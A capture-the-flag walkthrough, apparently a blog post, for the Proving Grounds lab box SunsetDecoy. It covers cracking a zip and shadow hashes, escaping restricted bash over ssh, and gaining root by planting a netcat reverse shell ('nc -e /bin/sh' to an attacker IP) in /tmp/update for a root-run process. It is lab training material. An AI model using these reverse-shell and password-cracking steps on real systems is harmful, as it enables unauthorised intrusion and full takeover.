Log in here with a Kali linux box: https://portal.offensive-security.com/proving-grounds/play
Get a free VPN set of credentials and connect. Click to start the target box called SunsetDecoy and do these steps:

  1. Scan to find tcp/22 and 80 open. Browse to 80 to find save.zip
  2. The file is password protected to crack it with something like frackzip or zip2john to find the password.
  3. Unzip to find key files from /etc/shadow, passwd, sudoers, hosts and others. Note the absurd username 296640a3b825115a47b68fc44501c828.
  4. Use ‘unshadow’ to combine passwd with shadow and run it through john the ripper to reveal the password for the absurd username numbers to connect with ssh with $ssh 296640a3b825115a47b68fc44501c828@ -t “bash –noprofile” and the password you find above. (I’m not telling it to you b/c I want you to learn through the process.)
  5. Once connected, you’ll be in rbash or restricted bash but the -t “bash –norofile” helps but you’ll have to specify binaries like with /usr/bin/cat (Absolute path)
  6. In the home directory of the user account ending in 828 above, you’ll see some files of interest, notably the first flag is there.
  7. The Av that you execute below looks for a file in /tmp/update and that process runs as root so …
  8. echo “/usr/bin/nc -e /bin/sh 192.168.X.X 4444” >/tmp/update and it will run as root when the AV process executes.
  9. On your local box, run #nc -lvp 4444 to intercept the incoming root shell from the target.
  10. Another key file is called honeypot.decoy that’s set to chmod +x. Run that and run the AV selection to execute the /tmp/update file that opens the reverse shell back to you.
  11. Check your netcat listener and you’ll see the shell open. You won’t get a local echo or prompt, just a new line with root privs.
  12. cd /root and cat proof.txt for the string to get credit.

PS You’ll see some decoys like in the honeypot.decoy binary when you run it and select ‘leave a message’. The filename generated is cmFuZG9tc2Zvc2FuZm9kYW52cw== . If you’re not familiar, this is a base64 encoded string.

To decode, enter $echo cmFuZG9tc2Zvc2FuZm9kYW52cw== |base64 -d

This isn’t useful for anything I found but it’s part of the process for uncovering information toward your objective.

By Greg Miller

Ex-military cyber officer. Triathlete and mountain bike racer.